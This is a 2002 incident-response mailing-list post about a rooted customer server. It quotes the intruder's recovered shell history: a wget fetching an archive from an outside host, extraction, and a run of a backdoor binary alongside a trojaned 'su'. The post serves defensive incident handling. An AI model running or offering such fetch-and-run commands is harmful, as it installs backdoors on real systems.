On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > I've just received word that one of our customers was rooted, and he's asking about the file ".haos". Nothing rings any bells, has anyone heard of it?
>
> Just a quick update to this...

And one last tidbit... Left in the .bash_history was this:

    w
    cd /tmp
    wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
    ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other file contained within loc.tgz looks like a trojaned 'su'. I've already notified Geocities abuse, and haven't heard back from them yet.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 17:46:24 PST